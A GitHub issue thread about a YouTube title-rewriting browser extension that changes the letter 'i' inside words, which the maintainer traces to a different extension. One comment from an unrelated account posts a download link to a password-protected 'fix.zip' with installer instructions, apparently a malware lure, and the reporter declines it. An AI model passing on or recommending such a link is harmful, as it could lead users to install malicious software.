### ISSUE TITLE
Title modification is too aggressive

### ISSUE THREAD

**Issue by VirdanTheBurden** [Megafat996/nuxify-youtuber#2]
The current implementation of your `modifyTitles` code is a bit too aggressive, especially with a phrase like "i". Ideally, only "i" the pronoun should be replaced, not "i" the letter, though the latter scenario seems to be the case.

![image](https://github.com/user-attachments/assets/0e5f8a8c-9337-4cb5-8cbb-f39e45230466)
(an example from a friend of mine—notice "lo-fi" has been replaced with "lo-fWE")

I'm not too familiar with Javascript personally (I usually write Python code), but perhaps you could check if a phrase exists as a "word" in the title, rather than checking against if the target exists as a substring within the title.

EDIT: Actually, just read the MDN Docs. Perhaps there's a better regex for this you could use? Currently experimenting.

**Comment by cnhbliyou** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by VirdanTheBurden** [comment]
Nah.
I'd skip.

**Comment by Megafat996** [comment]
> The current implementation of your `modifyTitles` code is a bit too aggressive, especially with a phrase like "i". Ideally, only "i" the pronoun should be replaced, not "i" the letter, though the latter scenario seems to be the case.
> 
> ![image](https://private-user-images.githubusercontent.com/73127621/362140428-0e5f8a8c-9337-4cb5-8cbb-f39e45230466.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjQ4MjM3MjcsIm5iZiI6MTcyNDgyMzQyNywicGF0aCI6Ii83MzEyNzYyMS8zNjIxNDA0MjgtMGU1ZjhhOGMtOTMzNy00Y2I1LThjYmItZjM5ZTQ1MjMwNDY2LnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA4MjglMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwODI4VDA1MzcwN1omWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPTQ2YzI5ZmJmMjUxMDgwMzMwZjBkOTI1OWI1NzFmMDg1ZmY3OTQyYzJjZDU3N2E5ZTFlMzM2NzBmNTUzNWYxMGQmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.Q4GUFfjYRskQEm4jRaIEgHm4-etyV_R1uM8E3GRLlM8) (an example from a friend of mine—notice "lo-fi" has been replaced with "lo-fWE")
> 
> I'm not too familiar with Javascript personally (I usually write Python code), but perhaps you could check if a phrase exists as a "word" in the title, rather than checking against if the target exists as a substring within the title.
> 
> EDIT: Actually, just read the MDN Docs. Perhaps there's a better regex for this you could use? Currently experimenting.

You are using a different nuxtaku extension. I've used a reg expression that prevents this error

**Comment by VirdanTheBurden** [comment]
Ah, that does seem to be the case! Deeply sorry about all that.

I'll close the issue and probably sweep this embarrassing moment under the rug to be brought up ten years later in my dreams :v
